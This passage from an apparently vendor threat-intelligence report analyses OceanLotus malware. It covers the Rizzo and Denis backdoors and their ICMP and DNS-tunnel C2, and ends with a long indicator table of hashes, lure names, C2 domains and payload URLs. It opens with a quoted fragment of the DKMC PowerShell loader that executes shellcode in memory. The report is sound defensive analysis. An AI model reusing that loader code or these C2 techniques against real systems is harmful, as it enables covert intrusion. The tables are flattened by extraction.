**[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address** kernel32.dll WaitForSingleObject), **(func_get_delegate_type @([IntPtr],** **[Int32]))).Invoke($var_** **hthread,0xffffffff)** **|** Out-Null ‘@ **If** **([IntPtr]::size -eq 8)** **{** start-job { param($a) IEX **$a** **}** **-RunAs32 -Argument $DoIt** **| wait-job | Receive-Job** **}** **else** **{** IEX **$DoIt** **}** _Figure 60: DKMC PowerShell shellcode loader_ ----- [https://github.com/Exploit-install/DKMC/blob/master/core/util/exec-sc.ps1](https://github.com/Exploit-install/DKMC/blob/master/core/util/exec-sc.ps1) The injected shellcode payload (stored in $var_code) creates a named pipe called “\\.\pipe\status_4598”: _Figure 61: Shellcode payload_ Any data read from the named pipe is executed directly as shellcode, allowing the threat actor to deploy additional payloads. ### Rizzo **Classification** Malware/Backdoor **Aliases** PHOREAL (FireEye) **Size** 304KB **Type** Win32 PE (DLL) **File Name** mobsync.exe **Observed** 2018 **Overview** Rizzo is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates to a list of four preconfigured C2 servers via ICMP on port 53. **Behavior** Upon execution of the exported “DllEntry” function, Rizzo proceeds to initialize Winsock 2.2 before creating a run once mutex: **Local\\{5FBC3F53-A76D-4248-969A-31740CBC8AD6}** _Figure 62: Rizzo run-once mutex_ The malware then tries to resolve the hardcoded C2 domain names. The list of domains are stored in an RC4 encrypted RT_ RCDATA/2 resource. |Rizzo|Col2| |---|---| |Classification|Malware/Backdoor PHOREAL (FireEye) 304KB Win32 PE (DLL) mobsync.exe 2018| |Aliases|| |Size|| |Type|| |File Name|| |Observed|| ----- _Figure 63: RCDATA resource containing RC4 key (in red) followed by encrypted C2 URLs_ _Figure 64: Decrypted C2 addresses_ _Figure 65: Rizzo C2 domains_ The backdoor also sets two values, “T” and “U”, under the HKCU\SOFTWARE\Microsoft\SkyDrive\{87F4F1B2-824E-420F-8B484E8B575C2A7B} registry key. The registry path is stored as a stack-based, RC4 encrypted string: _Figure 66: String decryption_ ----- **_Protocol_** In order to bypass firewalls and fly under the radar, the backdoor uses the ICMP protocol to communicate with the C2 server. _Figure 67: Creating an ICMP handle_ _Figure 68: Backdoor communication through ICMP_ The C2 command packets have the following format: **Offset** **Size** **Description** 0x0000 4 bytes Magic, or session ID 0x0004 4 bytes Command code 0x0008 variable Command parameters The backdoor response header consists of the following information: ----- **Command Code** **Parameters** **Description** ### Denis **Classification** Malware/Backdoor **Aliases** SOUNDBITE (FireEye) **Size** < 300KB **Type** Win32 PE (EXE) **File Name** CiscoEapFast.exe, WerFault.exe, SwUSB.exe, msprivs.exe, SndVolSSO.exe **Observed** 2016 **Overview** Denis is a simple backdoor developed by the OceanLotus Group, well observed in-the-wild and renowned for using DNS tunneling as a transport mechanism for C2 communications. Denis is typically deployed early in the attack lifecycle, and it appears to be less tailored/targeted than the more advanced backdoors that are utilized once a foothold has been established within an environment. **Behavior** Upon execution, Denis imports the bulk of its runtime APIs dynamically, with the DLL and function names encoded as stackbased strings: |Denis|Col2| |---|---| |Classification|Malware/Backdoor SOUNDBITE (FireEye) < 300KB Win32 PE (EXE) CiscoEapFast.exe, WerFault.exe, SwUSB.exe, msprivs.exe, SndVolSSO.exe 2016| |Aliases|| |Size|| |Type|| |File Name|| |Observed|| ----- _Figure 69: Denis import DLL and function names encoded on the stack_ These UNICODE strings are decoded using byte level add/subtract, depending on the variant: _Figure 70: ADD 0x80 string decoding_ This technique is used heavily amongst APT32 backdoors (for example Remy below): _Figure 71: Remy stack-based string decoding_ ----- used for C2 tunneling in much the same way as API/function names: _Figure 72: Denis C2 domain name decoding_ After decoding and reading configuration stored in the registry, Denis will create a thread to communicate with the C2 server, typically supporting the following commands: ----- typically routed via a DNS forwarder: _Figure 73: Denis DNS tunneling_ Denis samples have been observed using a variety of forwarders and name servers for C2, as well as using NULL/TEXT/CNAME records to embed encoded data, depending on configuration. ### Network Intelligence Network intelligence was initially obtained during November 2017. **167.114.44.146** All C2 domains were registered using Privacy Guardian on August 21, 2017. All host names resolve to the same Canadian IP address (167.114.44.146). **_Whois_** ----- **_First seen_** ----- **_Whois_** **_Domains_** **_First seen_** ----- **_Whois_** **89.249.65.134** **_Whois_** ----- **_First Seen_** _89.249.65.134_ **185.244.213.28** **_Whois_** ----- **_First seen_** ### Conclusions OceanLotus employs both home-brew and off-the-shelf RATs. They use PowerShell scripts from open-source exploit kits, including MSFvenom, Veil, and DKMC, to load shellcode and DLL payloads into memory. C2 functionality is customized to the target, and all domains are registered through an anonymization service called PrivacyGuardian. ### Appendix OceanLotus Table +1-844-CYLANCE [sales@cylance.com](mailto:sales%40cylance.com?subject=) [www.cylance.com](http://www.cylance.com) The Roland and Remy trojans share similarities and some code re-use with other known OceanLotus malware. The overall design and development of these threats indicate they come from a well-funded development team. The OceanLotus Group uses an expansive amount of custom library code that can easily be repurposed for maximum effectiveness against their next target. ----- # OceanLotus Table **MD5** **SHA256** **Source** **File Names** **Type** **Name** **Aliases** **Size** **Timestamp** **First Seen ITW** **Parent** **Relationships** **Hosted On** **C2** **IOCS** **Notes** 29a807b64777ea215b1953e091e8ea1c d2619dd966f942d9870e7728d4fb238f83b5769d84f0850e3df35ab167da3a41 Cy underwears.png PS1 + DLL Remy Windshield 364353 11/8/17 0:32 f9f843dc7c3486ea1ca979980a9fd318 72ab5a4086ab51b09bf0de3cff666fd0b50eb33581c06094d02f8283162fcf18 Cy gnsdk_submit.dll, certcredprovider.dll.mui DLL Roland 272872 5/28/09 13:54 Apr-17 partially obfuscated e1973fcd28806ef60f47d01f8b7cc23e a5497ec98195e7731b3de4f2e8c28083f86f46818ddc42425713be5410b9540d Cy plugin.lst DLL CamCapture 120320 10/24/07 4:23 Nov-17 rss.honoremarson.com, repo.paigeherzog. com, ssl.wolfgangneudorf.com, help. angelinagerste.com, mms.garyschulze.com 121918fd5630cb670d182c8483738bf1 d4008091d1b25214d7575881364d95f3ecdc0222f1e84c4c537ce87e5c4cd122 Cy OsErXrdO, wpfgfx_v0300.dll PS1 + EXE Splinter Komprogo (?) 2133014 7/13/10 11:49 Nov-17 http[:]//adstripstravel[.]com/resources/images/img.png a2859b211809978bd128a1025e403963 bacdb6a6bdd0b81c551ef30514dc3186f483b135fbc63759dd861d2de59585ad Cy img.png PS1 CobaltStrike 289385 Nov-17 http[:]//adstripstravel[.]com/user.ico 6575db1c50c5bdd0313622e16c08f79a 70a749a760e99471b6825818f9091f4ee08de538b4686fa0475f0df667e91643 Cy user.ico PS1 CobaltStrike 286001 Nov-17 http[:]//110.10.179[.]65:80/download/microsoft.jpg 40f644f1957d0a30ba76470279e1463a afaafe2944970913772d013853ecc297c66230fa25c78956ac53a6c933059276 9 microsoft.jpg PS1 CobaltStrike 287984 5/23/17 21:04 http[:]//support.chatconnecting[.]com:80/icon.ico 417a0ecf6459edf56ea704a9b5783208 aea41f0fe65b8d414fb0130089ffd84662e94062bbded7fcdfb144a8dc9156b3 9 icon.ico PS1 CobaltStrike 264862 12/7/17 20:28 d1e614479fee318904442c16c5ef4877 29bdd6341d59caa70a9e9f6229f7d4c2603d2ba333bc4573cf8c0faabe0f16af 5 hgfs.dll DLL 5407928 9/1/14 11:43 5/23/17 0:43 ef68cfad4cdae58624d12ff97ae00e68aafae9e6f33f3bd23dffc37869a1e578 1f8ade068ba6fbfe8605e0946bf2d79f c2f5ee2b99b2160178e947099d54cea940c21911997246938d274e9c6a834bc8 5 ep7res01.dll DLL 94720 10/20/10 20:09 5/23/17 0:43 ef68cfad4cdae58624d12ff97ae00e68aafae9e6f33f3bd23dffc37869a1e578 Creates/queries the following values under [HKLM|HKCU]\Software\ Microsoft\GameCenter\Identity: "ID", "Cert", "Counter" c117ea93410ad849e7a3ff9293bcd9ab 9453ab44d0e10a59b322614b9a76ab87deb4c93bfce6466d5afa945ea8ebb7d6 5 hp6000.dll DLL 94720 5/10/07 20:40 6/11/17 6:42 poses as QQ, loads backdoor module (Bundle.rdb) 0529b1d393f405bc2b2b33709dd57153 e6594d11244357537fa3ef5292cb52ccbd7c8f26a277f7003ade80964351878f 1 rtx.exe EXE Salgorea (Symc), 25904128 5/10/08 3:30 3/25/15 0:42 poses as QQ, loads backdoor module (Bundle.rdb) Encryptor (360) 41bced8c65c5822d43cadad7d1dc49fd d3cf53d74868625d4ee00e367162798f829acf532bad69cf1b7ce959de0e072a 1 NetcaEKeyClient.exe EXE Salgorea (Symc), 8608256 4/24/10 18:51 2/2/15 20:44 png.eirahrlichmann.com, engine.lanaurmi. Encryptor (360) com, movies.onaldest.com (87.98.153.188), images.andychroeder.com (87.98.153.188) bc1ccc120d185a0c36b191ec6b74397c c4d4169dc85ad57168b1efabdd32cb67a76c27ce1fb615685505b378ee345a3f 5 GoogleUpdateSetup.exe EXE 2508288 1/24/08 7:47 8/2/17 21:49 png.eirahrlichmann.com, engine.lanaurmi. com, movies.onaldest.com (89.34.237.142), images.andychroeder.com (89.34.237.142) 42123d2493598c9ac9803fe1b92ed032 969d97e3fe95de96971a65de02d2bf7fb7d81cbbda24dd47c3c1ffcf81bbcee3 5 GoogleUpdateSetup.exe EXE 2511360 2/12/06 8:11 6/1/17 4:50 http[:]//template.ethanypin[.]com/KoreanTimesSSK.ttf png.eirahrlichmann.com, engine.lanaurmi. com, movies.onaldest.com (89.34.237.142), images.andychroeder.com (89.34.237.142) 3b53e66f34beb3cd30e6a7da457e86c8 34cf914444493995379731c887637c07fd6308e412a15518b60a2642820f09d4 5 KoreanTimesSSK.ttf, KB3033929.exe EXE 1451520 2/13/11 16:41 6/11/17 6:42 png.eirahrlichmann.com, engine.lanaurmi. com, movies.onaldest.com (87.98.153.188), images.andychroeder.com (87.98.153.188) 3bd041ef488806c55fbc40b4af24eabb 66f7850c039cd85acdcb9a68674ec7422f9ab6edc89d95fb877562ca26d71d52 5 7zS.sfx.exe EXE 1709568 2/12/06 8:11 7/9/17 17:13 png.eirahrlichmann.com engine.lanaurmi. com, movies.onaldest.com (89.34.237.142), images.andychroeder.com (89.34.237.142) 46745e29f15eedfabba7e080f6295200 3caaa69c5ce00e17efc61a83ad71823dcfcca6a7c9dc013be3d58b1c894d407a 5 So tay van de phap ly cho cac nha hoat EXE 8260608 10/19/11 23:29 6/11/17 11:31 54df4c7e55ceb16e875b07b621b66f577f42198b85872261cd9a5be885ede7d2 http[:]//template.ethanypin[.]com/Cursif.ttf smtp.galamower.com (193.169.245.31), dong nhan quyen_20170427.final.exe help.galaspot.net (193.169.245.31), system.galaburner.info (1.1.1.1) e02e37ea705f1066798f285836a6fc46 ef68cfad4cdae58624d12ff97ae00e68aafae9e6f33f3bd23dffc37869a1e578 4 Cursif.ttf EXE 1517568 12/11/08 17:32 5/23/17 0:42 29bdd6341d59caa70a9e9f6229f7d4c2603d2ba333bc4573cf8c0faabe0f16af, smtp.galamower.com (193.169.245.31), c2f5ee2b99b2160178e947099d54cea940c21911997246938d274e9c6a834bc8 help.galaspot.net (193.169.245.31), system.galaburner.info (1.1.1.1) 7edcae7740ee7e7c75699cfbb4d89310 e7c855161c6240beb0dec7b8209df8289be22eb9665cf71cf76228472c9de8b5 4 Excel.exe EXE 1693696 12/21/10 21:49 7/23/17 4:45 https[:]//xc2dfa-sn3301.files.1drv[.]com/y4mzaSVTDpsdcSchibE9Jtc_ czEWKouetlGePP89op0rwCx471q4Eaj8LKql7iprSszeUCMeFSyiKTAiyNM4ONPPW6q_13rgYs6iJwE85LGfIKneCt7SVosmeM8K_ OZlnUn0NOiWGUa0S9vflX8YUBG4E6oE4Gss9vV3VhvxIAk-3eWztb5fY0v6CsXEbybiB8U DcTIj9dyK5ZwB1brAzUtQ/Install.RobotoSlab-Font.exe?download&psid=1 smtp.galamower.com (193.169.245.31), help.galaspot.net (193.169.245.31), system.galaburner.info (1.1.1.1) e71f3dc106852cd4648c41376204af9f 023a4f500af9aac9960066a96fb0d811e4e25df7d9d564b3d0cc899b7c2bb5b3 4 Install.RobotoSlab-Font.exe EXE 2044928 12/27/11 16:09 6/23/17 10:08 http[:]//download-attachments.s3.amazonaws[.]com/d00377793cdfea033296436c67cf2b3cf8989048/ http://185.141.27.116/xyz2, c9c5fb3a-936b-456e-9878-2e95becde07e http://185.141.27.116/safebrowsing/rd/ CltOb12nLW1IbHehcmUtd2hUdmFzEBAY70KIOkUDC7h2 9eed9619eac172fa0b29de755907759c 16fdb8f388f5a8737130d952f752fc9201ffde8549ae583c7582ab01147d171d 4 WinWorld.exe, Bai viet hot can dang bao final.exe, EXE CobaltStrike 184832 6/14/17 7:38 6/24/17 5:19 http://185.141.27.116/xyz2, Phu huynh khong tin tuong truong dai hoc hutech.exe http://185.141.27.116/safebrowsing/rd/ CltOb12nLW1IbHehcmUtd2hUdmFzEBAY70KIOkUDC7h2 c4dbc10104f058fcc5500d61cd48746a 82369d8e376beb0c26d93e16f9794139163ce14e394d113a84a40f96bcde0cbb 4 flash_installer.exe EXE CobaltStrike 181760 6/14/17 7:38 6/19/17 9:03 http://193.169.244.213/WQLp, http://193.169.244.213/safebrowsing/rd/ CltOb12nLW1IbHehcmUtd2hUdmFzEBAY70KIOkUDC7h2 c781b4cde28609ff2d7b217671e1f110 45243bd5eb94718bcc0b36d941989d9e2d8c9329c059c3e537513e7fa21e0f5a 4 fids.exe EXE Cloudrunner 70144 3/7/16 22:54 8/13/16 17:15 jeffreyue.com (46.183.222.84), Nasahlaes. (360) com, Jeffreyue.com, Rackerasr.com fcd7227891271a65b729a27de962c0cb b6b872de14275866bed7d9a7f685a382a29fa298394d21cdd365de452db5a3c8 6 FontExt.dll, adobe-font-pack.exe EXE Denis 1732096 11/16/11 9:54 10/15/17 6:47 urnage.com (173.209.43.20), Drops Salgorea DLL (loader) and alyerrac.com, ucaargo.com SyLog.bin (encrypted backdoor) 58d2907361f6414742dcc5071ca20980 5dff6bc9e8898f2ed09ced9ac23b7e4d867e90c3efbe42726edcb01ecb0b1673 6 flashplayer26pp_ka-install.exe, rastlsc.exe EXE Denis 2639872 9/17/08 19:34 7/28/17 10:11 16a608f88ef13ebdb2287482aa29629e7b34664cf133ab7d653c15808e92f8fa http[:]//dload01.s3.amazonaws[.]com/b89fdbf4-9f80-11e7-abc4-2209cec278b6b50a/FirefoxInstaller.exe maerferd.com (46.183.223.107), Drops Salgorea DLL (loader) and Harinarach.com, Eoneorbin.com SyLog.bin (encrypted backdoor) eb2b52ed27346962c4b7b26df51ebafa bdb83301a470d202480274df161638f83f8f26e7dda131a11b89a5a3d8259c73 6, 7, 10 FirefoxInstaller.exe, 7zS.sfx.exe EXE Denis 1673728 11/16/11 9:54 9/28/17 12:23 34ae9148a4db9993110e4fe4a0f8e9db17790b036ea0f5c236f53cbf845dd2a3 http[:]//103.53.197[.]172/Firefox%20Setup%20Stub.exe tsworthoa.com (23.227.201.220), Tsworthoa. Drops Salgorea DLL (loader) and ----- **yp** **p** **p** 1fa011e6a692ee95452c626e61b5263a 198e3c9e6f3dbcf586ac90486187ebfffdeb1c5d663131fc60c45451b04cce7a 6 Firefox Setup Stub.exe, 7zS.sfx.exe EXE Denis 1907712 11/16/11 9:54 9/15/17 16:44 30d6a4b9c41225c22b3d1bf2f1eab3d1c57c8b1a69502eab076a4f97f14023ac urnage.com (173.209.43.20) Drops Salgorea DLL (loader) and SyLog.bin (encrypted backdoor) 627e3ff5659b9a0ab9dc4b283c3288dd 5091430fac8b608ac612c35a1e29ce47cdeb22429657460dddc660727806b511 6 WinWord.exe, Chi tiet noi dung bai EXE Denis 2033152 10/14/09 22:21 8/6/17 20:13 08744b41169f163d1fde59f98f4702cef46632a50b7c2bcbda60ae6626170a3b arinaurna.com (74.121.190.150) Drops Salgorea DLL (loader) and viet dang len bao.docx.exe SyLog.bin (encrypted backdoor) d592b06f9d112c8650091166c19ea05a a17d4568ad5f745d36fc17846d3e0edf63d4e3c9fccb9861579e957f7a560217 6, 7 WinWord.exe, rastlsc.exe, Chi tiet danh sach EXE Denis 1503232 11/16/11 9:54 9/13/17 3:50 26529af7782a902c04ae01898c8b14c9f01302165335858ad666b10532584254 icmannaws.com (23.227.201.220), Icmannaws. Drops Salgorea DLL (loader) and nhan vien sai quy dinh can xu phat.exe com, Avidsontre.com, Lbertussbau.com SyLog.bin (encrypted backdoor) 88152846c45924d5706a11523942c82b 8f00c2dab8cc32e0052b7779de0bdc8faa385e890415555e86efdfc3b01cc504 6, 7 20170905-Evaluation Table.xls.exe EXE Denis 1719808 11/16/11 9:54 9/8/17 9:11 0528e2fa94f3b1253fe6c6a53452364568767253954630ab5cc141e41690ea43 http://cdn-download01.s3.amazonaws.com/07b3aa08-86-842a-48b1-8e57-383d56a0d2e9/FirefoxUpdate.exe aulolloy.com (46.183.223.107) Drops Salgorea DLL (loader) and SyLog.bin (encrypted backdoor) 05bc07fc6265e6affa8478118c02942a 890e5bd2650399d7fc3b543e8d1e65c0385f4d6003186245c8574c1913ca5d64 6 FirefoxUpdate.exe, 7zS.sfx.exe EXE Denis 1673728 11/16/11 9:54 9/27/17 9:53 6b560e2fc0be10d0ffd9e5440101f083ed7f5328735df79fd6c537c61bfcfe88 arinaurna.com (74.121.190.150), Arinaurna. Drops Salgorea DLL (loader) and com, Avidilleneu.com, Oftonlos.com SyLog.bin (encrypted backdoor) 75a9d759678834ade92e6ed8c6de569 30d06e100215461ad1c5b3bdb7a3b65c61f0ad27ebd733c7a37f40bd4b64932e 6 WinWord.exe EXE Denis 1729024 11/16/11 9:54 9/21/17 12:33 7477db2fab4dc77213008682e3302d6dd30e3963885f0a156d14bd067fa5b5cc tephens.com (74.121.190.150) Drops Salgorea DLL (loader) and SyLog.bin (encrypted backdoor) a7f98d3b7b7e2a7d1c194c2f26045618 c24e6d402a5adf1ece2d6a3dbe270e0904d43119d68e7862555505825a273cad 6 FontExt.dll EXE Denis 1500672 11/16/11 9:54 10/5/17 4:54 a40741b588147021ec0e9908857a2938f1d9bab73ebde18d2ea77feac053b1dc traveroyce.com (198.50.234.111) Drops Salgorea DLL (loader) and SyLog.bin (encrypted backdoor) 96b971c9ac868c8d9ae98618b9a9bddc 4ab2df974e5e563f611d7267916a00c18f819f5b8770ffcfadc5e1959047fb8e 6, 7 FontExt.dll, rastlsc.exe, RobototFontUpdate EXE Denis 1573376 11/16/11 9:54 10/5/17 10:38 06dec0082eac094dc0b4b3de8854f190f1d3112dada0d414d9a085a0ee309199 dwarduong.com (46.183.220.82), Erstin.com d95bbf9645994e891f3a8156eee9cbee d7549b1ddd668c5706b680654b2c39b6e401c55ecf25d0c4b1bff6468426e7ed 6 WinWord.exe, Thu moi tham du hoi nghi.doc.exe EXE Denis 1290752 11/16/11 9:54 9/8/17 10:55 chinanetworkvub.info ba844b09524aea077f6a175da10a6bf0 7c2b7593bcabdb253ebcf4905367d6760f53ac118edb70a305502ef11a63ec12 4 myvtfile.exe DOC Downloader 38912 7/14/17 7:03 a70e7d11fb221210b50691d2904712313bc94370dd7893bf1bf4501018a112a9, http[:]//lawph[.]info/download/images/user.gif 16fdb8f388f5a8737130d952f752fc9201ffde8549ae583c7582ab01147d171d fa6d09f010f11351a92c409fef7ba263 b6242d27c437a44b670c7a9a8a6bd2a92f6c4d66615310fadad146605d73e600 4 myfile.exe DOC Downloader 38912 5/23/17 10:09 9d57ce4d1578fe7b3651a98b41a62888a1b228d6152acfd3b5c3e0b4c81c77ad, http[:]//lawph[.]info/download/images/user.gif 82369d8e376beb0c26d93e16f9794139163ce14e394d113a84a40f96bcde0cbb 406dbee627ad8777d28ae2234a9e7c68 6b2a24e2818efff0e4571ae24f1aaffb9745c8b1426bfa57e6a7c067a7a074f8 4 Result Voting.xls DOC Downloader 105984 4/13/17 3:25 msofficecloud.org 5475d81ce3b3e018c33fbc83bdc0aa68 a87a14347dfa87128a5e5eb85067dbb6aac9d28484c08923c55c36ab1a3a99fa 4 myvtfile.exe DOC Downloader 38912 7/14/17 7:03 54bb003b233a2249bcd3f79fd8406727 e13cd452c0d9b8fa1a6f3a3b8722e35870efa0bec90bedf4eb757a9fe4c0c27b 4 HD_me_infect.doc DOC Downloader 130048 4/13/17 3:23 http[:]//chinanetworkvub[.]info/global/asian.jpg Blog.panggin.org, yii.yiihao126.net port numbers used: 443, 27408, 80, 40005 heavily obfuscated 90c3b5bcb26d83b34a81b302787933ba a70e7d11fb221210b50691d2904712313bc94370dd7893bf1bf4501018a112a9 4 asian.jpg, 10007.vbs PS1 + EXE Salgorea (Symc) 1826566 10/21/05 6:27 4/5/17 9:17 7c2b7593bcabdb253ebcf4905367d6760f53ac118edb70a305502ef11a63ec12 5458a2e4d784abb1a1127263bd5006b5 c161134bf3330c82eb0278fe54b2975c26301bdfdc4fc35d5344f9becf5574c7 2 2017 Statistical Report on Staff MIME/ Downloader 212546 3/2/17 7:01 Salary and Allowances.doc DOC/VBA ce50e544430e7265a45fab5a1f31e529 1210384a9d0ca2e089efab14f2e9f6d55a3824031c1e589b96f854fb96411288 2 Thong tin.doc MIME/ Downloader 79639 1/17/17 10:21 DOC/VBA 4f761095ca51bfbbf4496a4964e41d4f d0a725ee4602cd90493103648e6ec453b7987a016c19cff5c79cc42f4510e92f 2 Phan Vu Tutn CV.doc MIME/ Downloader 655017 10/10/16 17:05 DOC/VBA e9abe54162ba4572c770ab043f576784 1eca9dfd04fd5272a656d6e6d41c9ccc21a2700a979addf612a4de3b071253f5 2 Ke hoach cuu tro nam 2017.doc MIME/ Downloader 114686 3/1/17 3:55 DOC/VBA fba089444c769700e47c6b44c362f96b 703af242be581aa4c4c73b08ae57caf7c5d90f09f0991a963e07d02fb4209f75 2 Instructions to GSIS.doc MIME/ Downloader 160291 2/21/17 6:51 DOC/VBA f6ee4b72d6d42d0c7be9172be2b817c1 84d9af7b24ce85c3e5d97236c8562fcd45d34d99b07412fbdaca697c5961723e 2 Hoi thao truyen thong doc lap.doc MIME/ Downloader 656091 2/17/17 0:51 DOC/VBA aa1f85de3e4d33f31b4f78968b29f175 8c355092c7aaadb11748fd87ce528d3cdb483104e979d9b560af840eb8089f94 2 Gi�y yêu c�u b�i th��ng m�i 2016 - H�ng.doc MIME/ Downloader 239300 8/31/16 2:50 DOC/VBA 5180a8d9325a417f2d8066f9226a5154 fadb91606e09b86c39aad99b452525217563594dc9c610120860a38439adb243 2 Hoa don chi tiet tien no.doc MIME/ Downloader 81305 2/25/17 18:44 DOC/VBA f6ee4b72d6d42d0c7be9172be2b817c1 84d9af7b24ce85c3e5d97236c8562fcd45d34d99b07412fbdaca697c5961723e 2 Thu moi tham du Hoi luan.doc MIME/ Downloader 656091 2/17/17 0:51 DOC/VBA 6baafffa7bf960dec821b627f9653e44 1fc1bc4d004ab51398070d8e3025fecf8878229cda8befdbc9a2faf592b8d876 2 Danh sach nhan vien lam viec sai quy dinh.doc MIME/ Downloader 80047 9/6/16 10:20 DOC/VBA 471a2e7341f2614b715dc89e803ffcac 209c52bc39e8fa3df3d4d12a4d1913f3751582b34898adf966dd227cd5a0c99a 2 N�i-dung-qu�ng-cáo.doc MIME/ Downloader 228268 3/16/17 15:38 DOC/VBA f1af6bb36cdf3cff768faee7919f0733 453168b12bdc881bd6763fbc456620fd42efe6a718c6aecb2fa4982a44207999 2 HĐ DVPM-VTC 31.03.17.doc MIME/ Downloader 169965 4/3/17 9:21 kiifd.pozon7.net, pad.werzo.net, shop.ownpro.net DOC/VBA 9831a7bfcf595351206a2ea5679fa65e 12f941f43b5aba416cbccabf71bce2488a7e642b90a3a1cb0e4c75525abb2888 1 FlashUpdate.app Mach-O MacOS backdoor 38324 9/28/15 9:26 d802aa9938e87dc33cf2c7a07e920b0b 07154b7a45937f2f5a2cda5b701504b179d0304fc653edb2d0672f54796c35f7 3 Noi dung chi tiet Mach-O MacOS backdoor 96708 8/16/16 10:01 025faee9578c97fbaa0da61d55691758 5c0cda1f5f7e69ec3d2b9c6c129f3b0509af84ff6e6f4b18b401f37777096027 9 WinWord.exe EXE CobaltStrike 157184 3/13/17 7:16 3/24/17 9:31 dc1e8e868c347d310f24235eb4391559 8f667d56778a2c1d68fc33be1870ea0c5fda7173c8875eddb31a2a4a3b406f55 9 tx32.dll DLL CobaltStrike 310272 5/17/16 1:12 8/15/16 4:04 e2e4b2f28d29fd19bb28287a4d99ede2 9afd2ccb1e2c434d296a6fa54fa5425c827e4172947c05a7db226076996a3715 9 Flash.exe EXE CobaltStrike 313856 11/4/16 10:25 12/28/16 9:51 ac8b9e5c35e134da9ec701bcd9bcf760 e19fc649fe55d73eff5b1e3f7180d777fbc5d481855f0b4e8eb0b78a25212353 9 Flash.exe EXE CobaltStrike 313856 11/4/16 10:25 1/18/17 19:00 detected by Symc as Backdoor.Komprogo 05fb8bb25d02c96d17e8a4564f255252 d96f269b27138c282bd43beeb15f9f8ced006d2359ef43a79b98e3900e4f3a5e VT icons.exe, MsoCache.exe EXE Komprogo 507392 2/6/07 22:53 8/30/17 2:59 z.nsquery.net, z.tonholding.com Creates Mutex (8633f77ce68d3a4ce13b3654701d2daf_%USERNAME%) (Symc) 5394b09cf2a0b3d1caaecc46c0e502e3 087ef9f7ce4681d49c6fa8842785fedef21461f160a34fc37c75fed26ddfa91e 8 SndVolSSO.exe EXE Denis 198512 12/1/15 9:25 8/1/16 9:03 z.nsquery.net, z.tonholding.com Creates Mutex (8633f77ce68d3a4ce13b3654701d2daf_%USERNAME%) ----- **yp** **p** **p** 95a85454593426d42e45d11959801d58 10b09f64d75d748726a9b6a8880c6cd3cf8bcdb55c6b52e9a65940b27894f8e5 VT SndVolSSO.exe EXE Denis 198512 12/16/15 9:29 12/22/17 1:50 z.nsquery.net, z.tonholding.com, z.gl- Creates Mutex (8633f77ce68d3a4ce13b3654701d2daf_%USERNAME%) appspot.org, z.facebook-cdn.net facec411b6d6aa23ff80d1366633ea7a 155b13e582adeab564c60a1091b4dccc43ed78db290aa3e2da7e8bc1e039770c 8 mdnsNSP.exe EXE Denis 178688 12/26/13 12:19 3/10/17 22:48 z.vieweva.com, z.notificeva.com, Creates service (UPnP Device Hostz/upnphostz) c:\Program Files\ z.tulationeva.com, z.teriava.com CMAK\Support\en-US\msprivs.exe /k wcssvc 27ac632a3a270900986d7afef67317a2 699eb46678331ec02318bfcab291125ed707e6ab2b68ca18a5680fcd850c12f6 9 msprivs.exe EXE Denis 190464 8/18/12 19:12 3/10/17 8:55 z.tonholding.com, z.nsquery.net Creates service (Windows Color System/ WcsPlugInService) C:\Windows\xwizard.exe \k wcssvc 02b2d905a72c4bb2abfc278b8ca7f722 7f38efc01d7388df1a00500b5e9c857e47501066b49a8fcb8324378daab32d1e 9 xwizard.exe, KB12345678.exe EXE Denis 231936 12/1/15 9:25 8/1/16 9:07 z.facebook-cdn.net, z.nsquery.net, Creates Mutex (8633f77ce68d3a4ce13b3654701d2daf_%USERNAME%) z.tonholding.com, z.gl-appspot.org cf8d4728a093ce412d0477a2eadc2955 808a06b2726c642449d53dc01080a61bef3851eab9e0a99e44e3bbd19a74b63a 9 SwUSB.exe EXE Denis 179200 4/26/12 20:04 8/30/16 6:59 ns1.clearddns.com, search.ultraqueryns.biz Creates service (Microsoft .NET Framework NGEN v2.0.50725_X86/ clr_optimization_v2.0.50725_86) c:\Windows\Microsoft.NET\ Framework\v2.0.50725\mscorsvw.exe /s netsvcs 5421781c2c05e64ef20be54e2ee32e37 bb5114227ab5bb2e6bde5bcd876e437f72998ee88d27f7cbb15828c82666bef1 8 mscorsvw.exe EXE Denis 209920 12/21/15 2:35 3/8/17 17:01 z.notificeva.com, z.tulationeva.com, Creates service (UPnP Device Hosts/upnphosts) C:\ z.teriava.com, z.vieweva.com Windows\2be7b099\WerFault.exe /k wcssvc 9b7b0060229c6e3fd8a6c6599867b866 c8baddcd5967b502106f408cbe770c2af0256d6d0fcd11893719c0ecc8bc6cfd 9 WerFault.exe EXE Denis 202240 6/22/07 18:17 3/9/17 20:21 ns1.openddns.info, search.ultraqueryns.net Creates service (Microsoft .NET Framework NGEN v2.0.50725_X86/clr_optimization_ v2.0.50725_86) c:\Windows\Microsoft.NET\Framework\v2.0.50725\mscorsvw.exe 5bc2b316311c3d8104506795d843ca9d cb999fb3a5982c6b59fdfcd9e9a5fbf5727a48faf25f66e8e1664b9b807b7d29 VT mscorsvw.exe EXE Denis 300032 6/8/04 19:56 11/13/17 9:55 z.notificeva.com, z.vieweva.com, Creates Mutex (45f0b79fb0ddda42a5af2aad9de927a2_%USERNAME%) z.teriava.com, z.tulationeva.com b7b990fe7884b1ec0998ac465b936b8c ce478c8aabc980083a62f4ce4b040f1068e648d7cf6f3f94f283fd620eb8da24 9 CiscoEapFast.exe EXE Denis 179200 8/18/12 19:12 2/28/17 16:37 d957bccabad8af0e1b7fb7b7dd11a06d37656123ac97d353e1e93f0e72f35d49 z.tulationeva.com, z.vieweva.com, Creates service (UPnP Device Hostz/upnphostz) c:\Program Files\ z.notificeva.com, z.teriava.com CMAK\Support\en-US\msprivs.exe /k wcssvc, Creates Mutex (45f0b79fb0ddda42a5af2aad9de927a2_%USERNAME%) Drops Backdoor which masquerades as Cisco process to: "C:\Program Files\ Cisco\Cisco EAP-FAST Module\en-US\CiscoEapFAST.EXE" - SHA256 ce478c8aabc980083a62f4ce4b040f1068e648d7cf6f3f94f283fd620eb8da24, Creates copy of itself to: "C:\Program Files\CMAK\Support\en-US\msprivs.exe" - SHA256 - d957bccabad8af0e1b7fb7b7dd11a06d37656123ac97d353e1e93f0e72f35d49 18dde939dd712165fc71b35175869697 d957bccabad8af0e1b7fb7b7dd11a06d37656123ac97d353e1e93f0e72f35d49 9 msprivs.exe EXE Denis 190464 8/18/12 19:12 2/24/17 6:49 